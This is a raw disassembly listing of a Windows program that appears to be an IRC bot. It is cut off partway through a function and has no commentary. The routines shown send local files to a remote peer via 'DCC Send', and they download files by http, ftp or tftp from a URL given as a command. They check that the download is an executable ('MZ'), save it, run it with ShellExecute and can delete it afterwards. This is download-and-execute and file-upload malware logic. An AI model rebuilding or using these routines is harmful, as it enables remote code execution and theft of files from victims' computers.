call sub_410832 ; free
lea eax, [ebp+var_2D3]
push eax
call sub_410826 ; strlen
xor esi, esi
add esp, 14h
cmp eax, esi
jz short loc_401BCB
loc_401BBE: ; CODE XREF: sub_401B81+48�j
cmp [ebp+eax+var_2D3], 5Ch
jz short loc_401BD3
dec eax
jnz short loc_401BBE
loc_401BCB: ; CODE XREF: sub_401B81+3B�j
lea eax, [ebp+var_2D3]
jmp short loc_401BDA
; ---------------------------------------------------------------------------
loc_401BD3: ; CODE XREF: sub_401B81+45�j
lea eax, [ebp+eax+var_2D2]
loc_401BDA: ; CODE XREF: sub_401B81+50�j
push eax
lea eax, [ebp+var_3FC]
push eax
call sub_410820 ; _mbscpy
pop ecx
lea eax, [ebp+var_8]
pop ecx
mov [ebp+var_8], 10h
push eax
lea eax, [ebp+var_2C]
push eax
call sub_40882C
push eax
call ds:dword_411250 ; getsockname
push 2
push esi
push esi
lea eax, [ebp+var_A00]
push 401h
push eax
push [ebp+var_8]
lea eax, [ebp+var_2C]
push eax
call dword_417BB8 ; getnameinfo
test eax, eax
jz short loc_401C32
loc_401C25: ; CODE XREF: sub_401B81+E3�j
push [ebp+var_2F8]
call sub_406753
jmp short loc_401C91
; ---------------------------------------------------------------------------
loc_401C32: ; CODE XREF: sub_401B81+A2�j
lea eax, [ebp+var_14]
push 0Ah
push eax
push 1388h
push 400h
call sub_40AADE
pop ecx
pop ecx
push eax
call sub_410C9A ; _itoa
lea eax, [ebp+var_14]
push 1
push eax
call sub_4035FB
mov edi, eax
add esp, 14h
cmp edi, esi
mov [ebp+var_1C], edi
jz short loc_401C25
lea eax, [ebp+var_2D3]
push offset aRb ; "rb"
push eax
call sub_41086E ; fopen
mov ebx, eax
pop ecx
cmp ebx, esi
pop ecx
jnz short loc_401C97
push edi
call sub_4038E1
push [ebp+var_2F8]
call sub_406753
pop ecx
loc_401C91: ; CODE XREF: sub_401B81+AF�j
pop ecx
jmp loc_401E9F
; ---------------------------------------------------------------------------
loc_401C97: ; CODE XREF: sub_401B81+FC�j
push 2
push esi
push ebx
call sub_410886 ; fseek
push ebx
call sub_41085C ; ftell
push esi
push esi
push ebx
mov [ebp+var_4], eax
call sub_410886 ; fseek
add esp, 1Ch
lea eax, [ebp+var_A00]
push eax
lea eax, [ebp+var_3FC]
push eax
lea eax, [ebp+var_2F4]
push offset aDccSendSS ; "DCC Send %s (%s)"
push eax
call sub_408C6C
add esp, 10h
lea eax, [ebp+var_14]
push [ebp+var_4]
push eax
lea eax, [ebp+var_A00]
push eax
call ds:dword_411254 ; inet_addr
push eax
call ds:dword_41125C ; htonl
push eax
lea eax, [ebp+var_3FC]
push eax
lea eax, [ebp+var_2F4]
push offset dword_412348
push eax
call sub_408CDE
push 0EA60h
push edi
call sub_40371E
add esp, 20h
cmp eax, esi
mov [ebp+var_C], eax
jz loc_401E85
cmp eax, 0FFFFFFFFh
jz loc_401E85
lea eax, [ebp+var_2F4]
push eax
lea eax, [ebp+var_3FC]
push eax
mov eax, [ebp+var_2F8]
push dword ptr [eax]
lea eax, [ebp+var_1CF]
push offset dword_412320
push eax
call sub_408D50
call sub_41084A ; clock
mov esi, 200h
mov [ebp+arg_0], eax
push ebx
push esi
lea eax, [ebp+var_5FC]
push 1
push eax
call sub_410880 ; fread
add esp, 24h
loc_401D73: ; CODE XREF: sub_401B81+23A�j
mov edi, eax
test edi, edi
jz short loc_401DE1
cmp edi, esi
ja short loc_401DE1
lea eax, [ebp+var_5FC]
push edi
push eax
push [ebp+var_C]
call sub_403D54
add esp, 0Ch
test eax, eax
jz short loc_401DBD
cmp edi, esi
jb short loc_401DE1
mov eax, [ebp+var_2F8]
cmp dword ptr [eax+4], 0
jnz loc_401E5F
push ebx
push esi
lea eax, [ebp+var_5FC]
push 1
push eax
call sub_410880 ; fread
add esp, 10h
jmp short loc_401D73
; ---------------------------------------------------------------------------
loc_401DBD: ; CODE XREF: sub_401B81+211�j
lea eax, [ebp+var_2F4]
push eax
lea eax, [ebp+var_3FC]
push eax
lea eax, [ebp+var_1CF]
push offset dword_4122F4
push eax
call sub_408D50
add esp, 10h
jmp short loc_401E5F
; ---------------------------------------------------------------------------
loc_401DE1: ; CODE XREF: sub_401B81+1F6�j
; sub_401B81+1FA�j ...
call sub_41084A ; clock
cmp [ebp+arg_0], eax
jnz short loc_401DF4
call sub_41084A ; clock
dec eax
mov [ebp+arg_0], eax
loc_401DF4: ; CODE XREF: sub_401B81+268�j
mov eax, [ebp+var_4]
mov ecx, 400h
cdq
idiv ecx
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [ebp+var_18]
call sub_41084A ; clock
sub eax, [ebp+arg_0]
push ecx
push ecx
mov [ebp+var_4], eax
fild [ebp+var_4]
fmul ds:flt_411280
fdivr [ebp+var_18]
fstp [esp+0A14h+var_A14]
call sub_41084A ; clock
sub eax, [ebp+arg_0]
push ecx
push ecx
mov [ebp+arg_0], eax
lea eax, [ebp+var_2F4]
fild [ebp+arg_0]
fmul ds:flt_411280
fstp [esp+0A1Ch+var_A1C]
push eax
lea eax, [ebp+var_3FC]
push eax
lea eax, [ebp+var_1CF]
push offset dword_4122B0
push eax
call sub_408D50
add esp, 20h
loc_401E5F: ; CODE XREF: sub_401B81+221�j
; sub_401B81+25E�j
push [ebp+var_C]
call sub_403D27
push ebx
call sub_410868 ; fclose
push [ebp+var_1C]
call sub_4038E1
push [ebp+var_2F8]
call sub_406753
add esp, 10h
jmp short loc_401E9F
; ---------------------------------------------------------------------------
loc_401E85: ; CODE XREF: sub_401B81+19C�j
; sub_401B81+1A5�j
push ebx
call sub_410868 ; fclose
push edi
call sub_4038E1
push [ebp+var_2F8]
call sub_406753
add esp, 0Ch
loc_401E9F: ; CODE XREF: sub_401B81+111�j
; sub_401B81+302�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_401B81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EA8 proc near ; CODE XREF: sub_408F9D+194�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+arg_4], ebx
push esi
push edi
jz loc_401F9E
cmp [ebp+arg_8], ebx
jz loc_401F9E
cmp [ebp+arg_C], ebx
jz loc_401F9E
cmp [ebp+arg_10], ebx
jz loc_401F9E
push [ebp+arg_10]
call sub_41088C ; atoi
mov esi, eax
pop ecx
cmp esi, ebx
jz loc_401F9E
cmp esi, 0FFFFh
ja loc_401F9E
push [ebp+arg_14]
call sub_41088C ; atoi
mov edi, eax
pop ecx
cmp edi, ebx
jz loc_401F9E
cmp esi, 40000000h
ja loc_401F9E
push 3D6h
call sub_41082C ; malloc
mov esi, eax
pop ecx
cmp esi, ebx
jz short loc_401F9E
push 21h
lea eax, [esi+4]
push [ebp+arg_4]
push eax
call sub_41083E ; strncpy
push 104h
lea eax, [esi+25h]
push [ebp+arg_8]
push eax
call sub_41083E ; strncpy
push 100h
lea eax, [esi+129h]
push [ebp+arg_C]
push eax
call sub_41083E ; strncpy
push 6
lea eax, [esi+229h]
push [ebp+arg_10]
push eax
call sub_41083E ; strncpy
push 1A3h
lea eax, [esi+233h]
push [ebp+arg_0]
mov [esi+22Fh], edi
push eax
call sub_410838 ; memcpy
add esp, 3Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_41237C
push ebx
push esi
push offset sub_401985
call sub_40663C
add esp, 18h
loc_401F9E: ; CODE XREF: sub_401EA8+B�j
; sub_401EA8+14�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_401EA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401FA3 proc near ; CODE XREF: sub_40735A+3A0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push esi
jz short loc_402015
cmp [ebp+arg_8], 0
jz short loc_402015
push 2CCh
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_402015
push 21h
lea eax, [esi+4]
push [ebp+arg_4]
push eax
call sub_41083E ; strncpy
push 104h
lea eax, [esi+25h]
push [ebp+arg_8]
push eax
call sub_41083E ; strncpy
push 1A3h
lea eax, [esi+129h]
push [ebp+arg_0]
push eax
call sub_410838 ; memcpy
add esp, 24h
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_4123A0
push 0
push esi
push offset sub_401B81
call sub_40663C
add esp, 18h
loc_402015: ; CODE XREF: sub_401FA3+8�j
; sub_401FA3+E�j ...
pop esi
pop ebp
retn
sub_401FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402018 proc near ; CODE XREF: sub_402230+3CA�p
var_408 = byte ptr -408h
var_4 = dword ptr -4
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 408h
push ebx
push esi
mov ebx, 2710h
push edi
push ebx
push 0
push [ebp+arg_C]
push [ebp+arg_8]
call sub_403BBB
mov esi, eax
add esp, 10h
test esi, esi
mov [ebp+arg_C], esi
jz loc_402226
push [ebp+arg_8]
mov edi, 401h
lea eax, [ebp+var_408]
push [ebp+arg_10]
push offset aGetSHttp1_0Hos ; "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n"
push edi
push eax
call sub_41089E ; _snprintf
lea eax, [ebp+var_408]
push eax
call sub_410826 ; strlen
push eax
lea eax, [ebp+var_408]
push eax
push esi
call sub_403D54
push ebx
lea eax, [ebp+var_408]
push edi
push eax
push esi
call sub_403DAD
add esp, 34h
mov [ebp+arg_10], eax
test eax, eax
jz loc_40221F
cmp eax, 0FFFFFFFFh
jz loc_40221F
lea eax, [ebp+var_408]
push offset asc_4123EC ; "\r\n\r\n"
push eax
call sub_410898 ; strstr
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz loc_40221A
lea eax, [ebp+var_408]
push offset aContentLength ; "Content-Length: "
push eax
add esi, 4
call sub_410898 ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_40221A
cmp eax, esi
ja loc_40221A
and [ebp+var_4], 0
lea ecx, [ebp+var_4]
push ecx
push offset aContentLengthU ; "Content-Length: %u\r\n"
push eax
call sub_410892 ; sscanf
add esp, 0Ch
cmp eax, 1
jnz loc_40221A
mov ecx, [ebp+var_4]
test ecx, ecx
jz loc_40221A
cmp [ebp+arg_1C], 0
jz short loc_40212B
cmp ecx, 2
jb loc_40221A
cmp word ptr [esi], 5A4Dh
jnz loc_40221A
loc_40212B: ; CODE XREF: sub_402018+FD�j
mov eax, [ebp+arg_18]
test eax, eax
jz short loc_402134
mov [eax], ecx
loc_402134: ; CODE XREF: sub_402018+118�j
push [ebp+arg_14]
call sub_410521
test eax, eax
pop ecx
jnz loc_40221A
push offset dword_4122AC
push [ebp+arg_14]
call sub_41086E ; fopen
pop ecx
mov [ebp+arg_8], eax
test eax, eax
pop ecx
jnz short loc_40216D
loc_40215B: ; CODE XREF: sub_402018+1CF�j
xor esi, esi
loc_40215D: ; CODE XREF: sub_402018+1E0�j
push [ebp+arg_C]
call sub_403D27
pop ecx
mov eax, esi
jmp loc_402228
; ---------------------------------------------------------------------------
loc_40216D: ; CODE XREF: sub_402018+141�j
push eax
mov eax, [ebp+arg_10]
sub eax, esi
lea eax, [ebp+eax+var_408]
push eax
push 1
push esi
call sub_410862 ; fwrite
sub esi, [ebp+arg_10]
lea eax, [ebp+var_408]
add esp, 10h
sub esi, eax
add [ebp+var_4], esi
loc_402194: ; CODE XREF: sub_402018+1C7�j
mov eax, [ebp+arg_20]
test eax, eax
jz short loc_4021A1
cmp dword ptr [eax+4], 0
jnz short loc_4021EC
loc_4021A1: ; CODE XREF: sub_402018+181�j
push ebx
lea eax, [ebp+var_408]
push edi
push eax
push [ebp+arg_C]
call sub_403DAD
mov esi, eax
add esp, 10h
test esi, esi
jz short loc_4021FD
cmp esi, 0FFFFFFFFh
jz short loc_4021FD
cmp esi, [ebp+var_4]
push [ebp+arg_8]
ja short loc_4021E1
push esi
lea eax, [ebp+var_408]
push 1
push eax
call sub_410862 ; fwrite
add esp, 10h
sub [ebp+var_4], esi
jz short loc_4021EC
jmp short loc_402194
; ---------------------------------------------------------------------------
loc_4021E1: ; CODE XREF: sub_402018+1AE�j
call sub_410868 ; fclose
pop ecx
jmp loc_40215B
; ---------------------------------------------------------------------------
loc_4021EC: ; CODE XREF: sub_402018+187�j
; sub_402018+1C5�j
push [ebp+arg_8]
call sub_410868 ; fclose
pop ecx
push 1
pop esi
jmp loc_40215D
; ---------------------------------------------------------------------------
loc_4021FD: ; CODE XREF: sub_402018+1A1�j
; sub_402018+1A6�j
push [ebp+arg_8]
call sub_410868 ; fclose
push [ebp+arg_C]
call sub_403D27
pop ecx
pop ecx
push [ebp+arg_14]
call ds:dword_4110B8 ; DeleteFileA
jmp short loc_402226
; ---------------------------------------------------------------------------
loc_40221A: ; CODE XREF: sub_402018+A3�j
; sub_402018+C1�j ...
push [ebp+arg_C]
jmp short loc_402220
; ---------------------------------------------------------------------------
loc_40221F: ; CODE XREF: sub_402018+7D�j
; sub_402018+86�j
push esi
loc_402220: ; CODE XREF: sub_402018+205�j
call sub_403D27
pop ecx
loc_402226: ; CODE XREF: sub_402018+29�j
; sub_402018+200�j
xor eax, eax
loc_402228: ; CODE XREF: sub_402018+150�j
pop edi
pop esi
pop ebx
leave
retn
sub_402018 endp
; =============== S U B R O U T I N E =======================================
sub_40222D proc near ; CODE XREF: sub_402230+415�p
; sub_402230+452�p
xor eax, eax
retn
sub_40222D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402230 proc near ; DATA XREF: sub_4027CB+9F�o
var_7EC = qword ptr -7ECh
var_7D4 = byte ptr -7D4h
var_6D0 = byte ptr -6D0h
var_5D0 = byte ptr -5D0h
var_4CC = byte ptr -4CCh
var_4CB = byte ptr -4CBh
var_44C = byte ptr -44Ch
var_44B = byte ptr -44Bh
var_3CC = dword ptr -3CCh
var_3C8 = byte ptr -3C8h
var_3C7 = byte ptr -3C7h
var_3C2 = byte ptr -3C2h
var_3C1 = byte ptr -3C1h
var_2C4 = byte ptr -2C4h
var_1C0 = byte ptr -1C0h
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_36 = byte ptr -36h
var_33 = byte ptr -33h
var_26 = byte ptr -26h
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 7D4h
push ebx
push esi
push edi
push 3AFh
push [ebp+arg_0]
lea eax, [ebp+var_3CC]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
lea eax, [ebp+var_3C8]
push eax
lea eax, [ebp+var_7D4]
push eax
call sub_410820 ; _mbscpy
mov dl, byte_417B60
add esp, 18h
xor eax, eax
lea edi, [ebp+var_4CB]
push 1Fh
mov [ebp+var_4CC], dl
pop ecx
mov [ebp+var_44C], dl
rep stosd
stosw
stosb
push 1Fh
xor eax, eax
pop ecx
lea edi, [ebp+var_44B]
rep stosd
stosw
stosb
lea eax, [ebp+var_2C4]
xor ebx, ebx
push eax
lea eax, [ebp+var_7D4]
push eax
mov eax, [ebp+var_3CC]
mov dword ptr [ebp+var_14+4], 1
mov [ebp+arg_0], ebx
push dword ptr [eax]
lea eax, [ebp+var_1C0]
push offset dword_4125CC
push eax
call sub_408D50
push 7
lea eax, [ebp+var_3C8]
push offset dword_4125C4
push eax
call sub_410CA0 ; _strnicmp
add esp, 20h
test eax, eax
jnz short loc_402347
lea eax, [ebp+var_2C4]
push ebx
push eax
lea eax, [ebp+var_3C1]
push eax
call ds:dword_411068 ; CopyFileA
test eax, eax
jnz loc_402697
call ds:dword_41106C ; RtlGetLastWin32Error
cmp eax, 20h
jnz short loc_40232E
lea eax, [ebp+var_2C4]
push eax
mov eax, [ebp+var_3CC]
push dword ptr [eax]
push offset dword_41258C
jmp loc_40277E
; ---------------------------------------------------------------------------
loc_40232E: ; CODE XREF: sub_402230+E3�j
lea eax, [ebp+var_3C1]
push eax
mov eax, [ebp+var_3CC]
push dword ptr [eax]
push offset dword_41255C
jmp loc_40277E
; ---------------------------------------------------------------------------
loc_402347: ; CODE XREF: sub_402230+BB�j
lea eax, [ebp+var_3C8]
push eax
call sub_410826 ; strlen
pop ecx
mov esi, eax
loc_402356: ; CODE XREF: sub_402230+136�j
cmp esi, 0FFFFFFFFh
jz short loc_4023CD
cmp [ebp+esi+var_3C8], 3Ah
jz short loc_402368
dec esi
jmp short loc_402356
; ---------------------------------------------------------------------------
loc_402368: ; CODE XREF: sub_402230+133�j
cmp [ebp+esi+var_3C7], bl
push 1
pop edi
jz short loc_40239B
mov al, [ebp+esi+var_3C7]
lea ecx, [ebp+esi+var_3C8]
loc_402382: ; CODE XREF: sub_402230+169�j
cmp al, 2Fh
jz short loc_40239B
cmp al, 30h
jl short loc_4023CD
cmp al, 39h
jg short loc_4023CD
mov byte ptr [ebp+edi+var_C+3], al
mov al, [ecx+edi+1]
inc edi
cmp al, bl
jnz short loc_402382
loc_40239B: ; CODE XREF: sub_402230+142�j
; sub_402230+154�j
lea eax, [ebp+var_8]
mov byte ptr [ebp+edi+var_C+3], bl
push eax
call sub_40325E
test eax, eax
pop ecx
jz short loc_4023CD
add edi, esi
lea eax, [ebp+edi+var_3C8]
push eax
lea eax, [ebp+esi+var_3C8]
push eax
call sub_410820 ; _mbscpy
pop ecx
mov [ebp+arg_0], 1
pop ecx
loc_4023CD: ; CODE XREF: sub_402230+129�j
; sub_402230+158�j ...
push 7
lea eax, [ebp+var_3C8]
push offset aHttp ; "http://"
push eax
call sub_410CA0 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40241D
cmp [ebp+arg_0], ebx
jnz short loc_4023FC
lea eax, [ebp+var_8]
push offset a80 ; "80"
push eax
call sub_410820 ; _mbscpy
pop ecx
pop ecx
loc_4023FC: ; CODE XREF: sub_402230+1BA�j
lea eax, [ebp+var_3C1]
push eax
lea eax, [ebp+var_3C8]
push eax
call sub_410820 ; _mbscpy
pop ecx
mov [ebp+arg_0], 1
pop ecx
jmp loc_4024D9
; ---------------------------------------------------------------------------
loc_40241D: ; CODE XREF: sub_402230+1B5�j
push 6
lea eax, [ebp+var_3C8]
push offset aFtp ; "ftp://"
push eax
call sub_410CA0 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40248A
cmp [ebp+arg_0], ebx
jnz short loc_40244C
lea eax, [ebp+var_8]
push offset a21 ; "21"
push eax
call sub_410820 ; _mbscpy
pop ecx
pop ecx
loc_40244C: ; CODE XREF: sub_402230+20A�j
lea eax, [ebp+var_3C2]
push eax
lea eax, [ebp+var_3C8]
push eax
call sub_410820 ; _mbscpy
mov esi, offset aAnonymous ; "anonymous"
lea eax, [ebp+var_4CC]
push esi
push eax
mov [ebp+arg_0], 2
call sub_410820 ; _mbscpy
lea eax, [ebp+var_44C]
push esi
push eax
call sub_410820 ; _mbscpy
add esp, 18h
jmp short loc_4024D9
; ---------------------------------------------------------------------------
loc_40248A: ; CODE XREF: sub_402230+205�j
push 7
lea eax, [ebp+var_3C8]
push offset aTftp ; "tftp://"
push eax
call sub_410CA0 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_40279B
cmp [ebp+arg_0], ebx
jnz short loc_4024BD
lea eax, [ebp+var_8]
push offset a69 ; "69"
push eax
call sub_410820 ; _mbscpy
pop ecx
pop ecx
loc_4024BD: ; CODE XREF: sub_402230+27B�j
lea eax, [ebp+var_3C1]
push eax
lea eax, [ebp+var_3C8]
push eax
call sub_410820 ; _mbscpy
pop ecx
mov [ebp+arg_0], 3
pop ecx
loc_4024D9: ; CODE XREF: sub_402230+1E8�j
; sub_402230+258�j
lea eax, [ebp+var_3C8]
push eax
call sub_410826 ; strlen
pop ecx
mov esi, eax
loc_4024E8: ; CODE XREF: sub_402230+2C8�j
cmp esi, 0FFFFFFFFh
jz short loc_40255C
cmp [ebp+esi+var_3C8], 40h
jz short loc_4024FA
dec esi
jmp short loc_4024E8
; ---------------------------------------------------------------------------
loc_4024FA: ; CODE XREF: sub_402230+2C5�j
lea eax, [ebp+var_3C8]
push offset asc_412528 ; ":"
push eax
mov [ebp+esi+var_3C8], bl
call sub_410898 ; strstr
pop ecx
cmp eax, ebx
pop ecx
mov edi, 80h
jz short loc_402531
mov [eax], bl
inc eax
push edi
push eax
lea eax, [ebp+var_44C]
push eax
call sub_4052A6
add esp, 0Ch
loc_402531: ; CODE XREF: sub_402230+2EB�j
lea eax, [ebp+var_3C8]
push edi
push eax
lea eax, [ebp+var_4CC]
push eax
call sub_4052A6
lea eax, [ebp+esi+var_3C7]
push eax
lea eax, [ebp+var_3C8]
push eax
call sub_410820 ; _mbscpy
add esp, 14h
loc_40255C: ; CODE XREF: sub_402230+2BB�j
lea eax, [ebp+var_3C8]
push offset asc_412524 ; "/"
push eax
call sub_410898 ; strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jnz short loc_402587
mov eax, [ebp+var_3CC]
push dword ptr [eax]
push offset unk_4124F8
jmp loc_4027A8
; ---------------------------------------------------------------------------
loc_402587: ; CODE XREF: sub_402230+343�j
lea eax, [esi+1]
push eax
lea eax, [ebp+var_5D0]
push eax
call sub_410820 ; _mbscpy
lea eax, [ebp+var_3C8]
mov [esi], bl
push eax
lea eax, [ebp+var_6D0]
push eax
call sub_410820 ; _mbscpy
add esp, 10h
call sub_41084A ; clock
cmp [ebp+arg_0], 1
mov dword ptr [ebp+var_1C+4], eax
mov [ebp+var_C], ebx
jnz short loc_402605
push [ebp+var_3CC]
xor eax, eax
cmp [ebp+var_38], bl
setnz al
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_5D0]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6D0]
push eax
lea eax, [ebp+var_44C]
push eax
lea eax, [ebp+var_4CC]
push eax
call sub_402018
add esp, 24h
mov dword ptr [ebp+var_14+4], eax
loc_402605: ; CODE XREF: sub_402230+38E�j
cmp [ebp+arg_0], 2
jnz short loc_402650
push [ebp+var_3CC]
xor eax, eax
cmp [ebp+var_38], bl
setnz al
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_5D0]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6D0]
push eax
lea eax, [ebp+var_44C]
push eax
lea eax, [ebp+var_4CC]
push eax
call sub_40222D
add esp, 24h
mov dword ptr [ebp+var_14+4], eax
loc_402650: ; CODE XREF: sub_402230+3D9�j
cmp [ebp+arg_0], 3
jnz short loc_40268D
push [ebp+var_3CC]
xor eax, eax
cmp [ebp+var_38], bl
setnz al
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_5D0]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6D0]
push eax
call sub_40222D
add esp, 1Ch
mov dword ptr [ebp+var_14+4], eax
loc_40268D: ; CODE XREF: sub_402230+424�j
cmp dword ptr [ebp+var_14+4], 1
jnz loc_40276A
loc_402697: ; CODE XREF: sub_402230+D4�j
cmp [ebp+var_26], bl
jz short loc_4026A3
mov eax, offset dword_4124EC
jmp short loc_4026B2
; ---------------------------------------------------------------------------
loc_4026A3: ; CODE XREF: sub_402230+46A�j
cmp [ebp+var_36], bl
mov eax, offset dword_4124E0
jnz short loc_4026B2
mov eax, offset byte_417B60
loc_4026B2: ; CODE XREF: sub_402230+471�j
; sub_402230+47B�j
push eax
mov eax, [ebp+var_C]
shr eax, 0Ah
mov dword ptr [ebp+var_14], eax
mov dword ptr [ebp+var_14+4], ebx
fild [ebp+var_14]
fstp [ebp+arg_0]
call sub_41084A ; clock
sub eax, dword ptr [ebp+var_1C+4]
mov dword ptr [ebp+var_1C+4], ebx
push ecx
push ecx
mov dword ptr [ebp+var_1C], eax
lea eax, [ebp+var_2C4]
fild [ebp+var_1C]
fmul ds:flt_411280
fdivr [ebp+arg_0]
fstp [esp+7ECh+var_7EC]
push eax
mov eax, [ebp+var_3CC]
push dword ptr [eax]
lea eax, [ebp+var_1C0]
push offset dword_412498
push eax
call sub_408D50
add esp, 1Ch
cmp [ebp+var_37], bl
jz short loc_40271B
lea eax, [ebp+var_2C4]
push eax
call ds:dword_4110B8 ; DeleteFileA
jmp short loc_40278D
; ---------------------------------------------------------------------------
loc_40271B: ; CODE XREF: sub_402230+4DA�j
cmp [ebp+var_36], bl
jnz short loc_402725
cmp [ebp+var_26], bl
jz short loc_40278D
loc_402725: ; CODE XREF: sub_402230+4EE�j
xor eax, eax
cmp [ebp+var_33], bl
setz al
push eax
push ebx
lea eax, [ebp+var_2C4]
push ebx
push eax
push offset aOpen ; "open"
push ebx
call ds:dword_4111E4
cmp eax, 20h
jbe short loc_402754
cmp [ebp+var_26], bl
jz short loc_40278D
call sub_404BC3
jmp short loc_40278D
; ---------------------------------------------------------------------------
loc_402754: ; CODE XREF: sub_402230+516�j
lea eax, [ebp+var_2C4]
push eax
mov eax, [ebp+var_3CC]
push dword ptr [eax]
push offset dword_412470
jmp short loc_40277E
; ---------------------------------------------------------------------------
loc_40276A: ; CODE XREF: sub_402230+461�j
lea eax, [ebp+var_7D4]
push eax
mov eax, [ebp+var_3CC]
push dword ptr [eax]
push offset dword_412440
loc_40277E: ; CODE XREF: sub_402230+F9�j
; sub_402230+112�j ...
lea eax, [ebp+var_1C0]
push eax
call sub_408D50
add esp, 10h
loc_40278D: ; CODE XREF: sub_402230+4E9�j
; sub_402230+4F3�j ...
push [ebp+var_3CC]
call sub_406753
pop ecx
jmp short loc_4027C2
; ---------------------------------------------------------------------------
loc_40279B: ; CODE XREF: sub_402230+272�j
mov eax, [ebp+var_3CC]
push dword ptr [eax]
push offset unk_412414
loc_4027A8: ; CODE XREF: sub_402230+352�j
lea eax, [ebp+var_1C0]
push eax
call sub_408D50
push [ebp+var_3CC]
call sub_406753
add esp, 10h
loc_4027C2: ; CODE XREF: sub_402230+569�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_402230 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027CB proc near ; CODE XREF: sub_40735A+37E�p
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_4], 0
push esi
jz loc_402879
push 3AFh
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz loc_402879
push 8
push 7Ah
push 61h
lea eax, [ebp+var_10]
push 4
push eax
call sub_40AB82
and [ebp+eax+var_10], 0
lea eax, [ebp+var_10]
push offset dword_412620
push eax
call sub_410856 ; _mbscat
add esp, 1Ch
cmp [ebp+arg_8], 0
jnz short loc_402824
lea eax, [ebp+var_10]
mov [ebp+arg_8], eax
loc_402824: ; CODE XREF: sub_4027CB+51�j
push ebx
push edi
mov edi, 104h
lea ebx, [esi+4]
push edi
push [ebp+arg_4]
push ebx
call sub_4052A6
push edi
lea eax, [esi+108h]
push [ebp+arg_8]
push eax
call sub_4052A6
push [ebp+arg_0]
lea eax, [esi+20Ch]
push eax
call sub_403E60
add esp, 20h
lea eax, [esi+108h]
push eax
push ebx
push offset dword_4125FC
push 0
push esi
push offset sub_402230
call sub_40663C
add esp, 18h
pop edi
pop ebx
loc_402879: ; CODE XREF: sub_4027CB+B�j
; sub_4027CB+20�j
pop esi
leave
retn
sub_4027CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40287C proc near ; CODE XREF: sub_4064A0+7E�p
; sub_406596+83�p ...
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
push 1
push offset dword_417B6C
call sub_406AFA
mov esi, [ebp+arg_0]
xor edi, edi
cmp dword_417B68, edi
pop ecx
pop ecx
mov ebx, eax
jz loc_402994
mov edx, [esi]
mov eax, 0C0000025h
mov edi, offset aException_othe ; "EXCEPTION_OTHER"
mov ecx, [edx]
cmp ecx, eax
ja short loc_4028F1
jz short loc_4028EA
cmp ecx, 80000003h
jz short loc_4028E3
cmp ecx, 0C0000005h
jz short loc_4028DC
cmp ecx, 0C000001Dh
jnz short loc_402924
mov edi, offset aException_ille ; "EXCEPTION_ILLEGAL_INSTRUCTION"
jmp short loc_402924
; ---------------------------------------------------------------------------
loc_4028DC: ; CODE XREF: sub_40287C+4F�j
mov edi, offset aException_acce ; "EXCEPTION_ACCESS_VIOLATION"
jmp short loc_402924
; ---------------------------------------------------------------------------
loc_4028E3: ; CODE XREF: sub_40287C+47�j
mov edi, offset aException_brea ; "EXCEPTION_BREAKPOINT"
jmp short loc_402924
; ---------------------------------------------------------------------------
loc_4028EA: ; CODE XREF: sub_40287C+3F�j
mov edi, offset aException_nonc ; "EXCEPTION_NONCONTINUABLE_EXCEPTION"
jmp short loc_402924
; ---------------------------------------------------------------------------
loc_4028F1: ; CODE XREF: sub_40287C+3D�j
cmp ecx, 0C000008Dh
jb short loc_402924
cmp ecx, 0C0000093h
jbe short loc_40291F
cmp ecx, 0C0000094h
jz short loc_402918
cmp ecx, 0C00000FDh
